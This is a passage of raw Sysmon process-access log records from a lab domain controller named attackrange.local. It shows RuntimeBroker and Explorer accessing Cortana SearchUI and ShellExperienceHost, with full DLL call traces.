13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000012340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+115a9|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d4e3|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d7a9|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+1a9001|C:\Windows\System32\TwinUI.dll+bade1|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+1a9001|C:\Windows\System32\TwinUI.dll+bade1|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+1a9001|C:\Windows\System32\TwinUI.dll+bade1|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba500|C:\Windows\System32\TwinUI.dll+b9e0e|C:\Windows\System32\TwinUI.dll+badc3|C:\Windows\System32\TwinUI.dll+bae62|C:\Windows\System32\TwinUI.dll+137c27|C:\Windows\System32\TwinUI.dll+1385af|C:\Windows\System32\TwinUI.dll+139427|C:\Windows\System32\TwinUI.dll+d2084|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93FA-6005-FC04-00000000A301}37841752C:\Windows\Explorer.EXE{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12a3cc|C:\Windows\System32\TwinUI.dll+b60d4|C:\Windows\System32\TwinUI.dll+b1e1b|C:\Windows\System32\TwinUI.dll+d206a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system
32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012329Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012323Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012322Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.883{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal